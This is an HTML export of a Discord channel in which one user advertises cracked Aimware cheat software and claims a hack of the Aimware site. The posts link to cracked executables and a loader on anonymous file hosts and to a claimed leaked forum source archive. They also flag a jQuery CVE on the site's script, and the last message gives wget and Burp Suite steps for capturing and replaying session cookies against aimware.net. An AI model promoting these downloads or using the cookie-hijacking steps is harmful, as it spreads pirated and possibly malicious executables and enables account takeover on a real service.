

<!DOCTYPE html>
<html lang="en">

<head>
    <title>&#127879;&#119815;&#120786;&#119857;&#119851;&#120782;&#119857;-&#119810;&#119845;&#119854;&#119835;&#127879; - &#128162;&#119808;imware-hacked</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width">

    <style>
        /* General */

@font-face {
    font-family: Whitney;
    src: url(https://cdn.jsdelivr.net/gh/Tyrrrz/DiscordFonts@master/whitney-300.woff);
    font-weight: 300;
}

@font-face {
    font-family: Whitney;
    src: url(https://cdn.jsdelivr.net/gh/Tyrrrz/DiscordFonts@master/whitney-400.woff);
    font-weight: 400;
}

@font-face {
    font-family: Whitney;
    src: url(https://cdn.jsdelivr.net/gh/Tyrrrz/DiscordFonts@master/whitney-500.woff);
    font-weight: 500;
}

@font-face {
    font-family: Whitney;
    src: url(https://cdn.jsdelivr.net/gh/Tyrrrz/DiscordFonts@master/whitney-600.woff);
    font-weight: 600;
}

@font-face {
    font-family: Whitney;
    src: url(https://cdn.jsdelivr.net/gh/Tyrrrz/DiscordFonts@master/whitney-700.woff);
    font-weight: 700;
}

body {
    font-family: "Whitney", "Helvetica Neue", Helvetica, Arial, sans-serif;
    font-size: 17px;
}

a {
    text-decoration: none;
}

a:hover {
    text-decoration: underline;
}

img {
    object-fit: contain;
}

.markdown {
    max-width: 100%;
    line-height: 1.3;
    overflow-wrap: break-word;
}

.preserve-whitespace {
    white-space: pre-wrap;
}

.spoiler {
    /* width: fit-content; */
    display: inline-block;
    /* This is more consistent across browsers, the old attribute worked well under Chrome but not FireFox. */
}

.spoiler--hidden {
    cursor: pointer;
}

.spoiler-text {
    border-radius: 3px;
}

.spoiler--hidden .spoiler-text {
    color: rgba(0, 0, 0, 0);
}

.spoiler--hidden .spoiler-text::selection {
    color: rgba(0, 0, 0, 0);
}

.spoiler-image {
    position: relative;
    overflow: hidden;
    border-radius: 3px;
}

.spoiler--hidden .spoiler-image {
    box-shadow: 0 0 1px 1px rgba(0, 0, 0, 0.1);
}

.spoiler--hidden .spoiler-image * {
    filter: blur(44px);
}

.spoiler--hidden .spoiler-image:after {
    content: "SPOILER";
    color: #dcddde;
    background-color: rgba(0, 0, 0, 0.6);
    position: absolute;
    left: 50%;
    top: 50%;
    transform: translate(-50%, -50%);
    font-weight: 600;
    padding: 100%;
    border-radius: 20px;
    letter-spacing: 0.05em;
    font-size: 0.9em;
}

.spoiler--hidden:hover .spoiler-image:after {
    color: #fff;
    background-color: rgba(0, 0, 0, 0.9);
}

.quote {
    margin: 0.1em 0;
    padding-left: 0.6em;
    border-left: 4px solid;
    border-radius: 3px;
}

.pre {
    font-family: "Consolas", "Courier New", Courier, monospace;
}

.pre--multiline {
    margin-top: 0.25em;
    padding: 0.5em;
    border: 2px solid;
    border-radius: 5px;
}

.pre--inline {
    padding: 2px;
    border-radius: 3px;
    font-size: 0.85em;
}

.mention {
    border-radius: 3px;
    padding: 0 2px;
    color: #7289da;
    background: rgba(114, 137, 218, .1);
    font-weight: 500;
}

.emoji {
    width: 1.25em;
    height: 1.25em;
    margin: 0 0.06em;
    vertical-align: -0.4em;
}

.emoji--small {
    width: 1em;
    height: 1em;
}

.emoji--large {
    width: 2.8em;
    height: 2.8em;
}

/* Preamble */

.preamble {
    display: grid;
    margin: 0 0.3em 0.6em 0.3em;
    max-width: 100%;
    grid-template-columns: auto 1fr;
}

.preamble__guild-icon-container {
    grid-column: 1;
}

.preamble__guild-icon {
    max-width: 88px;
    max-height: 88px;
}

.preamble__entries-container {
    grid-column: 2;
    margin-left: 0.6em;
}

.preamble__entry {
    font-size: 1.4em;
}

.preamble__entry--small {
    font-size: 1em;
}

/* Chatlog */

.chatlog {
    max-width: 100%;
}

.chatlog__message-group {
    display: grid;
    margin: 0 0.6em;
    padding: 0.9em 0;
    border-top: 1px solid;
    grid-template-columns: auto 1fr;
}

.chatlog__reference-symbol {
    grid-column: 1;
    border-style: solid;
    border-width: 2px 0 0 2px;
    border-radius: 8px 0 0 0;
    margin-left: 16px;
    margin-top: 8px;
}

.chatlog__reference {
    display: flex;
    grid-column: 2;
    margin-left: 1.2em;
    margin-bottom: 0.25em;
    font-size: 0.875em;
    white-space: nowrap;
    overflow: hidden;
    text-overflow: ellipsis;
    align-items: center;
}

.chatlog__reference-avatar {
    border-radius: 50%;
    height: 16px;
    width: 16px;
    margin-right: 0.25em;
}

.chatlog__reference-name {
    margin-right: 0.25em;
    font-weight: 600;
}

.chatlog__reference-link {
    flex-grow: 1;
    overflow: hidden;
    text-overflow: ellipsis;
}

.chatlog__reference-link:hover {
    text-decoration: none;
}

.chatlog__reference-content > * {
    display: inline;
}

.chatlog__reference-edited-timestamp {
    margin-left: 0.25em;
    font-size: 0.8em;
}

.chatlog__author-avatar-container {
    grid-column: 1;
    width: 40px;
    height: 40px;
}

.chatlog__author-avatar {
    border-radius: 50%;
    height: 40px;
    width: 40px;
}

.chatlog__messages {
    grid-column: 2;
    margin-left: 1.2em;
    min-width: 50%;
}

.chatlog__author-name {
    font-weight: 500;
}

.chatlog__timestamp {
    margin-left: 0.3em;
    font-size: 0.75em;
}

.chatlog__message {
    padding: 0.1em 0.3em;
    margin: 0 -0.3em;
    background-color: transparent;
    transition: background-color 1s ease;
}

.chatlog__content {
    font-size: 0.95em;
    word-wrap: break-word;
}

.chatlog__edited-timestamp {
    margin-left: 0.15em;
    font-size: 0.8em;
}

.chatlog__attachment {
    margin-top: 0.3em;
}

.chatlog__attachment-thumbnail {
    vertical-align: top;
    max-width: 45vw;
    max-height: 500px;
    border-radius: 3px;
}

.chatlog__attachment-container {
    height: 40px;
    width: 100%;
    max-width: 520px;
    padding: 10px;
    border: 1px solid;
    border-radius: 3px;
    overflow: hidden;
}

.chatlog__attachment-icon {
    float: left;
    height: 100%;
    margin-right: 10px;
}

.chatlog__attachment-icon > .a {
    fill: #f4f5fb;
    d: path("M50,935a25,25,0,0,1-25-25V50A25,25,0,0,1,50,25H519.6L695,201.32V910a25,25,0,0,1-25,25Z");
}

.chatlog__attachment-icon > .b {
    fill: #7789c4;
    d: path("M509.21,50,670,211.63V910H50V50H509.21M530,0H50A50,50,0,0,0,0,50V910a50,50,0,0,0,50,50H670a50,50,0,0,0,50-50h0V191Z");
}

.chatlog__attachment-icon > .c {
    fill: #f4f5fb;
    d: path("M530,215a25,25,0,0,1-25-25V50a25,25,0,0,1,16.23-23.41L693.41,198.77A25,25,0,0,1,670,215Z");
}

.chatlog__attachment-icon > .d {
    fill: #7789c4;
    d: path("M530,70.71,649.29,190H530V70.71M530,0a50,50,0,0,0-50,50V190a50,50,0,0,0,50,50H670a50,50,0,0,0,50-50Z");
}

.chatlog__attachment-filesize {
    color: #72767d;
    font-size: 12px;
}

.chatlog__attachment-filename {
    overflow: hidden;
    white-space: nowrap;
    text-overflow: ellipsis;
}

.chatlog__embed {
    display: flex;
    margin-top: 0.3em;
    max-width: 520px;
}

.chatlog__embed-color-pill {
    flex-shrink: 0;
    width: 0.25em;
    border-top-left-radius: 3px;
    border-bottom-left-radius: 3px;
}

.chatlog__embed-content-container {
    display: flex;
    flex-direction: column;
    padding: 0.5em 0.6em;
    border: 1px solid;
    border-top-right-radius: 3px;
    border-bottom-right-radius: 3px;
}

.chatlog__embed-content {
    display: flex;
    width: 100%;
}

.chatlog__embed-text {
    flex: 1;
}

.chatlog__embed-author {
    display: flex;
    margin-bottom: 0.3em;
    align-items: center;
}

.chatlog__embed-author-icon {
    margin-right: 0.5em;
    width: 20px;
    height: 20px;
    border-radius: 50%;
}

.chatlog__embed-author-name {
    font-size: 0.875em;
    font-weight: 600;
}

.chatlog__embed-title {
    margin-bottom: 0.2em;
    font-size: 0.875em;
    font-weight: 600;
}

.chatlog__embed-description {
    font-weight: 500;
    font-size: 0.85em;
}

.chatlog__embed-fields {
    display: flex;
    flex-wrap: wrap;
}

.chatlog__embed-field {
    flex: 0;
    min-width: 100%;
    max-width: 506px;
    padding-top: 0.6em;
    font-size: 0.875em;
}

.chatlog__embed-field--inline {
    flex: 1;
    flex-basis: auto;
    min-width: 150px;
}

.chatlog__embed-field-name {
    margin-bottom: 0.2em;
    font-weight: 600;
}

.chatlog__embed-field-value {
    font-weight: 500;
}

.chatlog__embed-thumbnail {
    flex: 0;
    margin-left: 1.2em;
    max-width: 80px;
    max-height: 80px;
    border-radius: 3px;
}

.chatlog__embed-image-container {
    margin-top: 0.6em;
}

.chatlog__embed-image {
    max-width: 500px;
    max-height: 400px;
    border-radius: 3px;
}

.chatlog__embed-footer {
    margin-top: 0.6em;
}

.chatlog__embed-footer-icon {
    margin-right: 0.2em;
    width: 20px;
    height: 20px;
    border-radius: 50%;
    vertical-align: middle;
}

.chatlog__embed-footer-text {
    font-size: 0.75em;
    font-weight: 500;
}

.chatlog__reactions {
    display: flex;
}

.chatlog__reaction {
    display: flex;
    align-items: center;
    margin: 0.35em 0.1em 0.1em 0.1em;
    padding: 0.2em 0.35em;
    border-radius: 3px;
}

.chatlog__reaction-count {
    min-width: 9px;
    margin-left: 0.35em;
    font-size: 0.875em;
}

.chatlog__bot-tag {
    position: relative;
    top: -.2em;
    margin-left: 0.3em;
    padding: 0.05em 0.3em;
    border-radius: 3px;
    vertical-align: middle;
    line-height: 1.3;
    background: #7289da;
    color: #ffffff;
    font-size: 0.625em;
    font-weight: 500;
}

/* Postamble */

.postamble {
    margin: 1.4em 0.3em 0.6em 0.3em;
    padding: 1em;
    border-top: 1px solid;
}
    </style>
    <style>
        /* General */

body {
    background-color: #36393e;
    color: #dcddde;
}

a {
    color: #0096cf;
}

.spoiler-text {
    background-color: rgba(255, 255, 255, 0.1);
}

.spoiler--hidden .spoiler-text {
    background-color: #202225;
}

.spoiler--hidden:hover .spoiler-text {
    background-color: rgba(32, 34, 37, 0.8);
}

.quote {
    border-color: #4f545c;
}

.pre {
    background-color: #2f3136 !important;
}

.pre--multiline {
    border-color: #282b30 !important;
    color: #b9bbbe !important;
}

/* === Preamble === */

.preamble__entry {
    color: #ffffff;
}

/* Chatlog */

.chatlog__message-group {
    border-color: rgba(255, 255, 255, 0.1);
}

.chatlog__reference-symbol {
    border-color: #4f545c;
}

.chatlog__reference {
    color: #b5b6b8;
}

.chatlog__reference-link {
    color: #b5b6b8;
}

.chatlog__reference-link:hover {
    color: #ffffff;
}

.chatlog__reference-edited-timestamp {
    color: rgba(255, 255, 255, 0.2);
}

.chatlog__author-name {
    color: #ffffff;
}

.chatlog__timestamp {
    color: rgba(255, 255, 255, 0.2);
}

.chatlog__message--highlighted {
    background-color: rgba(114, 137, 218, 0.2) !important;
}

.chatlog__message--pinned {
    background-color: rgba(249, 168, 37, 0.05);
}

.chatlog__attachment-container {
    background-color: #2f3136;
    border-color: #292b2f;
}

.chatlog__edited-timestamp {
    color: rgba(255, 255, 255, 0.2);
}

.chatlog__embed-color-pill--default {
    background-color: rgba(79, 84, 92, 1);
}

.chatlog__embed-content-container {
    background-color: rgba(46, 48, 54, 0.3);
    border-color: rgba(46, 48, 54, 0.6);
}

.chatlog__embed-author-name {
    color: #ffffff;
}

.chatlog__embed-author-name-link {
    color: #ffffff;
}

.chatlog__embed-title {
    color: #ffffff;
}

.chatlog__embed-description {
    color: rgba(255, 255, 255, 0.6);
}

.chatlog__embed-field-name {
    color: #ffffff;
}

.chatlog__embed-field-value {
    color: rgba(255, 255, 255, 0.6);
}

.chatlog__embed-footer {
    color: rgba(255, 255, 255, 0.6);
}

.chatlog__reaction {
    background-color: rgba(255, 255, 255, 0.05);
}

.chatlog__reaction-count {
    color: rgba(255, 255, 255, 0.3);
}

/* Postamble */

.postamble {
    border-color: rgba(255, 255, 255, 0.1);
}

.postamble__entry {
    color: #ffffff;
}
    </style>

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.15.6/styles/solarized-dark.min.css">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.15.6/highlight.min.js"></script>
    <script>
        document.addEventListener('DOMContentLoaded', () => {
            document.querySelectorAll('.pre--multiline').forEach(block => hljs.highlightBlock(block));
        });
    </script>

    <script>
        function scrollToMessage(event, id) {
            var element = document.getElementById('message-' + id);

            if (element) {
                event.preventDefault();

                element.classList.add('chatlog__message--highlighted');

                window.scrollTo({
                    top: element.getBoundingClientRect().top - document.body.getBoundingClientRect().top - (window.innerHeight / 2),
                    behavior: 'smooth'
                });

                window.setTimeout(function() {
                    element.classList.remove('chatlog__message--highlighted');
                }, 2000);
            }
        }

        function showSpoiler(event, element) {
            if (element && element.classList.contains('spoiler--hidden')) {
                event.preventDefault();
                element.classList.remove('spoiler--hidden');
            }
        }
    </script>
</head>
<body>

<div class="preamble">
    <div class="preamble__guild-icon-container">
        <img class="preamble__guild-icon" src="https://cdn.discordapp.com/icons/683489364680114203/a_8922dfc6f3ff187985e37c121f895024.png" alt="Guild icon">
    </div>
    <div class="preamble__entries-container">
        <div class="preamble__entry">&#127879;&#119815;&#120786;&#119857;&#119851;&#120782;&#119857;-&#119810;&#119845;&#119854;&#119835;&#127879;</div>
        <div class="preamble__entry">&#127775;▬ /h4xr0x-YouTube\ ▬&#127775; / &#128162;&#119808;imware-hacked</div>


    </div>
</div>

<div class="chatlog">


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
        <span class="chatlog__author-name" title="h4xr0x#4277" data-user-id="673018051796533294" style="color: rgb(255,0,0)">h4xr0x</span>


        <span class="chatlog__timestamp">20-May-20 01:00 AM</span>

            <div class="chatlog__message " data-message-id="712545174881959946" id="message-712545174881959946">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><a href="https://www.youtube.com/watch?v=8jUBGdctQW8">https://www.youtube.com/watch?v=8jUBGdctQW8</a></span>

                        </div>
                    </div>


                    <div class="chatlog__embed">
                            <div class="chatlog__embed-color-pill" style="background-color: rgba(255,0,0,255)"></div>

                        <div class="chatlog__embed-content-container">
                            <div class="chatlog__embed-content">
                                <div class="chatlog__embed-text">
                                        <div class="chatlog__embed-author">

                                                <span class="chatlog__embed-author-name">
                                                        <a class="chatlog__embed-author-name-link" href="https://www.youtube.com/channel/UCiRPPIMDiLVSDIkRLope27w">Robert Belsha</a>
                                                </span>
                                        </div>

                                        <div class="chatlog__embed-title">
                                                <a class="chatlog__embed-title-link" href="https://www.youtube.com/watch?v=8jUBGdctQW8">
                                                    <div class="markdown preserve-whitespace">Aimware Update Cracked Free Download [REAL] by h4xr0x</div>
                                                </a>
                                        </div>

                                        <div class="chatlog__embed-description">
                                            <div class="markdown preserve-whitespace">Download FREE hacks &amp; tools at: <a href="http://h4xr0x.cc/">http://h4xr0x.cc/</a> <a href="https://discord.gg/YwNTUgY">https://discord.gg/YwNTUgY</a> if expired can always find new link at <a href="http://h4xr0x.tk">http://h4xr0x.tk</a> or <a href="http://h4xr0x.ml">http://h4xr0x.ml</a>  ( just click the gif )</div>
                                        </div>

                                </div>

                                    <div class="chatlog__embed-thumbnail-container">
                                        <a class="chatlog__embed-thumbnail-link" href="https://i.ytimg.com/vi/8jUBGdctQW8/hqdefault.jpg">
                                            <img class="chatlog__embed-thumbnail" src="https://i.ytimg.com/vi/8jUBGdctQW8/hqdefault.jpg" alt="Thumbnail">
                                        </a>
                                    </div>
                            </div>


                        </div>
                    </div>

            </div>
            <div class="chatlog__message " data-message-id="712545324857557072" id="message-712545324857557072">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><a href="https://www.youtube.com/watch?v=G3WLMAmDJm0&t">https://www.youtube.com/watch?v=G3WLMAmDJm0&amp;t</a></span>

                        </div>
                    </div>


                    <div class="chatlog__embed">
                            <div class="chatlog__embed-color-pill" style="background-color: rgba(255,0,0,255)"></div>

                        <div class="chatlog__embed-content-container">
                            <div class="chatlog__embed-content">
                                <div class="chatlog__embed-text">
                                        <div class="chatlog__embed-author">

                                                <span class="chatlog__embed-author-name">
                                                        <a class="chatlog__embed-author-name-link" href="https://www.youtube.com/channel/UCiRPPIMDiLVSDIkRLope27w">Robert Belsha</a>
                                                </span>
                                        </div>

                                        <div class="chatlog__embed-title">
                                                <a class="chatlog__embed-title-link" href="https://www.youtube.com/watch?v=G3WLMAmDJm0&amp;start=">
                                                    <div class="markdown preserve-whitespace">Aimware Cracked [REAL] Burp Suite</div>
                                                </a>
                                        </div>

                                        <div class="chatlog__embed-description">
                                            <div class="markdown preserve-whitespace">Download FREE hacks &amp; tools at: <a href="http://h4xr0x.cc/">http://h4xr0x.cc/</a> <a href="https://discord.gg/YwNTUgY">https://discord.gg/YwNTUgY</a> if expired can always find new link at <a href="http://h4xr0x.tk">http://h4xr0x.tk</a> or <a href="http://h4xr0x.ml">http://h4xr0x.ml</a>  ( just click the gif )
PROOF
<a href="https://pasteboard.co/Idccsku.png">https://pasteboard.co/Idccsku.png</a>
<a href="https://pasteboard.co/IdcdXDc.png">https://pasteboard.co/IdcdXDc.png</a>
<a href="https://pasteboard.co/Idce">https://pasteboard.co/Idce</a>...</div>
                                        </div>

                                </div>

                                    <div class="chatlog__embed-thumbnail-container">
                                        <a class="chatlog__embed-thumbnail-link" href="https://i.ytimg.com/vi/G3WLMAmDJm0/maxresdefault.jpg">
                                            <img class="chatlog__embed-thumbnail" src="https://i.ytimg.com/vi/G3WLMAmDJm0/maxresdefault.jpg" alt="Thumbnail">
                                        </a>
                                    </div>
                            </div>


                        </div>
                    </div>

            </div>
            <div class="chatlog__message " data-message-id="712545418294329374" id="message-712545418294329374">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><a href="https://www.youtube.com/watch?v=KYs0nrH5UxQ">https://www.youtube.com/watch?v=KYs0nrH5UxQ</a></span>

                        </div>
                    </div>


                    <div class="chatlog__embed">
                            <div class="chatlog__embed-color-pill" style="background-color: rgba(255,0,0,255)"></div>

                        <div class="chatlog__embed-content-container">
                            <div class="chatlog__embed-content">
                                <div class="chatlog__embed-text">
                                        <div class="chatlog__embed-author">

                                                <span class="chatlog__embed-author-name">
                                                        <a class="chatlog__embed-author-name-link" href="https://www.youtube.com/channel/UCiRPPIMDiLVSDIkRLope27w">Robert Belsha</a>
                                                </span>
                                        </div>

                                        <div class="chatlog__embed-title">
                                                <a class="chatlog__embed-title-link" href="https://www.youtube.com/watch?v=KYs0nrH5UxQ">
                                                    <div class="markdown preserve-whitespace">aimware hacked download loader REAL &amp; FREE</div>
                                                </a>
                                        </div>

                                        <div class="chatlog__embed-description">
                                            <div class="markdown preserve-whitespace">join discord for full tutorial: <a href="http://h4xr0x.cc/">http://h4xr0x.cc/</a> <a href="https://discord.gg/YwNTUgY">https://discord.gg/YwNTUgY</a>
Click the Gif at <a href="http://h4xr0x.ml">http://h4xr0x.ml</a> or <a href="http://h4xr0x.tk">http://h4xr0x.tk</a> for always updated link to discord server! FREE HACKS, LEAKS!

Download V5 Loader :: <a href="https://anonfile.com/Xeq3G2daoa/AIMWAREV5_exe">https://anonfile.com/Xeq3G2daoa/AIMWAREV5_exe</a>
Download cfgs +...</div>
                                        </div>

                                </div>

                                    <div class="chatlog__embed-thumbnail-container">
                                        <a class="chatlog__embed-thumbnail-link" href="https://i.ytimg.com/vi/KYs0nrH5UxQ/sddefault.jpg">
                                            <img class="chatlog__embed-thumbnail" src="https://i.ytimg.com/vi/KYs0nrH5UxQ/sddefault.jpg" alt="Thumbnail">
                                        </a>
                                    </div>
                            </div>


                        </div>
                    </div>

            </div>
            <div class="chatlog__message " data-message-id="712545490704793661" id="message-712545490704793661">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><a href="https://www.youtube.com/watch?v=bWMElBkUXv4">https://www.youtube.com/watch?v=bWMElBkUXv4</a></span>

                        </div>
                    </div>


                    <div class="chatlog__embed">
                            <div class="chatlog__embed-color-pill" style="background-color: rgba(255,0,0,255)"></div>

                        <div class="chatlog__embed-content-container">
                            <div class="chatlog__embed-content">
                                <div class="chatlog__embed-text">
                                        <div class="chatlog__embed-author">

                                                <span class="chatlog__embed-author-name">
                                                        <a class="chatlog__embed-author-name-link" href="https://www.youtube.com/channel/UCiRPPIMDiLVSDIkRLope27w">Robert Belsha</a>
                                                </span>
                                        </div>

                                        <div class="chatlog__embed-title">
                                                <a class="chatlog__embed-title-link" href="https://www.youtube.com/watch?v=bWMElBkUXv4">
                                                    <div class="markdown preserve-whitespace">Aimware Hacked Full Dump + Crack</div>
                                                </a>
                                        </div>

                                        <div class="chatlog__embed-description">
                                            <div class="markdown preserve-whitespace">Download: <a href="https://h4xr0x.cc">https://h4xr0x.cc</a>
Join our discord! <a href="https://discord.com/invite/tXS2Ecu">https://discord.com/invite/tXS2Ecu</a>
Download Aimware Cracked: <a href="https://anonfile.com/13w0Tdzboc/AIMWAREv5_Cracked_exe">https://anonfile.com/13w0Tdzboc/AIMWAREv5_Cracked_exe</a>
Aimware Dump:
<a href="https://pasteboard.co/J996WFt.png">https://pasteboard.co/J996WFt.png</a>
<a href="https://pasteboard.co/J9180aW.png">https://pasteboard.co/J9180aW.png</a>
<a href="https://pasteboard.co/J9195mz.png">https://pasteboard.co/J9195mz.png</a>
...</div>
                                        </div>

                                </div>

                                    <div class="chatlog__embed-thumbnail-container">
                                        <a class="chatlog__embed-thumbnail-link" href="https://i.ytimg.com/vi/bWMElBkUXv4/sddefault.jpg">
                                            <img class="chatlog__embed-thumbnail" src="https://i.ytimg.com/vi/bWMElBkUXv4/sddefault.jpg" alt="Thumbnail">
                                        </a>
                                    </div>
                            </div>


                        </div>
                    </div>

                    <div class="chatlog__reactions">
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="&#128077;" title="&#128077;" src="https://twemoji.maxcdn.com/2/72x72/1f44d.png">
                                <span class="chatlog__reaction-count">3</span>
                            </div>
                    </div>
            </div>
            <div class="chatlog__message " data-message-id="712545709479559228" id="message-712545709479559228">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/712545709261324328/251a2601-d904-48c8-bc20-413feae88edb.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/712545709261324328/251a2601-d904-48c8-bc20-413feae88edb.png" alt="Image attachment" title="Image: 251a2601-d904-48c8-bc20-413feae88edb.png (75.56 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


                    <div class="chatlog__reactions">
                            <div class="chatlog__reaction">
                                <img class="emoji emoji--small" alt="&#128175;" title="&#128175;" src="https://twemoji.maxcdn.com/2/72x72/1f4af.png">
                                <span class="chatlog__reaction-count">2</span>
                            </div>
                    </div>
            </div>
            <div class="chatlog__message " data-message-id="712546086094503996" id="message-712546086094503996">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><a href="https://aimware.net/forum/jscripts/jquery.js">https://aimware.net/forum/jscripts/jquery.js</a></span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="712546250397843506" id="message-712546250397843506">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/712546250188128276/a1d25372-c829-4ce4-b5c1-2cbf972392a9.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/712546250188128276/a1d25372-c829-4ce4-b5c1-2cbf972392a9.png" alt="Image attachment" title="Image: a1d25372-c829-4ce4-b5c1-2cbf972392a9.png (111.97 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="712547211136991242" id="message-712547211136991242">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/712547210943922186/9ad1845a-4fc9-455f-b67a-d64a3fe4bec0.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/712547210943922186/9ad1845a-4fc9-455f-b67a-d64a3fe4bec0.png" alt="Image attachment" title="Image: 9ad1845a-4fc9-455f-b67a-d64a3fe4bec0.png (13.89 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="712547489504428032" id="message-712547489504428032">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/712547489311359086/62b7c180-c18f-40c0-9f56-b98a4d69846c.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/712547489311359086/62b7c180-c18f-40c0-9f56-b98a4d69846c.png" alt="Image attachment" title="Image: 62b7c180-c18f-40c0-9f56-b98a4d69846c.png (105.86 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="712547654139379803" id="message-712547654139379803">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><a href="https://anonfile.com/13w0Tdzboc/AIMWAREv5_Cracked_exe">https://anonfile.com/13w0Tdzboc/AIMWAREv5_Cracked_exe</a></span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="712547743197036544" id="message-712547743197036544">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>and what im willing to share from the dump atm</strong></span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="712547750402850857" id="message-712547750402850857">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><a href="https://uploadfiles.io/nj78x679">https://uploadfiles.io/nj78x679</a></span>

                        </div>
                    </div>


                    <div class="chatlog__embed">
                            <div class="chatlog__embed-color-pill chatlog__embed-color-pill--default"></div>

                        <div class="chatlog__embed-content-container">
                            <div class="chatlog__embed-content">
                                <div class="chatlog__embed-text">

                                        <div class="chatlog__embed-title">
                                                <a class="chatlog__embed-title-link" href="https://uploadfiles.io/nj78x679">
                                                    <div class="markdown preserve-whitespace">Upload files for free @UploadFilesFree</div>
                                                </a>
                                        </div>

                                        <div class="chatlog__embed-description">
                                            <div class="markdown preserve-whitespace">aimware_forum_source.7z - Uploadfiles.io @UploadFilesFree</div>
                                        </div>

                                </div>

                            </div>


                        </div>
                    </div>

            </div>
            <div class="chatlog__message " data-message-id="712548932261249082" id="message-712548932261249082">

                    <div class="chatlog__attachment">
                        <div class="" onclick="">
                            <div class="">
                                    <a href="https://cdn.discordapp.com/attachments/712543386250248265/712548932273569812/81118d65-8a51-4f3c-9f9a-a1ecba56f141.png">
                                        <img class="chatlog__attachment-thumbnail" src="https://cdn.discordapp.com/attachments/712543386250248265/712548932273569812/81118d65-8a51-4f3c-9f9a-a1ecba56f141.png" alt="Image attachment" title="Image: 81118d65-8a51-4f3c-9f9a-a1ecba56f141.png (39.44 KB)">
                                    </a>
                            </div>
                        </div>
                    </div>


            </div>
            <div class="chatlog__message " data-message-id="712549056924090399" id="message-712549056924090399">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><a href="https://www.cvedetails.com/cve/CVE-2019-11358/">https://www.cvedetails.com/cve/CVE-2019-11358/</a></span>

                        </div>
                    </div>


                    <div class="chatlog__embed">
                            <div class="chatlog__embed-color-pill chatlog__embed-color-pill--default"></div>

                        <div class="chatlog__embed-content-container">
                            <div class="chatlog__embed-content">
                                <div class="chatlog__embed-text">

                                        <div class="chatlog__embed-title">
                                                <a class="chatlog__embed-title-link" href="https://www.cvedetails.com/cve/CVE-2019-11358/">
                                                    <div class="markdown preserve-whitespace">CVE-2019-11358 : jQuery before 3.4.0, as used in Drupal, Backdrop C...</div>
                                                </a>
                                        </div>

                                        <div class="chatlog__embed-description">
                                            <div class="markdown preserve-whitespace">CVE-2019-11358 : jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable <u>proto</u> property, it could extend the native Obje...</div>
                                        </div>

                                </div>

                            </div>


                        </div>
                    </div>

            </div>
            <div class="chatlog__message " data-message-id="712549095557824612" id="message-712549095557824612">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><a href="https://aimware.net/forum/jscripts/jquery.js">https://aimware.net/forum/jscripts/jquery.js</a></span>

                        </div>
                    </div>



            </div>
            <div class="chatlog__message " data-message-id="712549431521837076" id="message-712549431521837076">
                    <div class="chatlog__content">
                        <div class="markdown">
                            <span class="preserve-whitespace"><strong>How to click jack cookie?</strong>
Use burpsuite + edit this cookie; when you capture session export it.

<strong>Example of setting a cookie:</strong>
     wget --save-cookies cookies.txt \
     --post-data &#39;user=foo&amp;password=bar&#39; \
     <a href="https://aimware.net">https://aimware.net</a>                                                                                                                                                                                              
<strong>How to post a cookie you export?</strong> 
wget --load-cookies cookies.txt \
     <a href="http://aimware.net">http://aimware.net</a>

<strong>How to download aimware website?:</strong>
wget -e robots=off --recursive --page-requisites --adjust-extension --span-hosts --convert-links --restrict-file-names=windows --domains aimware.net --no-parent aimware.net/</span>

                                <span class="chatlog__edited-timestamp" title="20-May-20 01:18 AM">(edited)</span>
                        </div>
                    </div>



            </div>
    </div>
</div>


<div class="chatlog__message-group">
    <div class="chatlog__author-avatar-container">
        <img class="chatlog__author-avatar" src="https://cdn.discordapp.com/avatars/673018051796533294/f988e53d97758aaf925e8092f566cce5.png" alt="Avatar">
    </div>
    <div class="chatlog__messages">
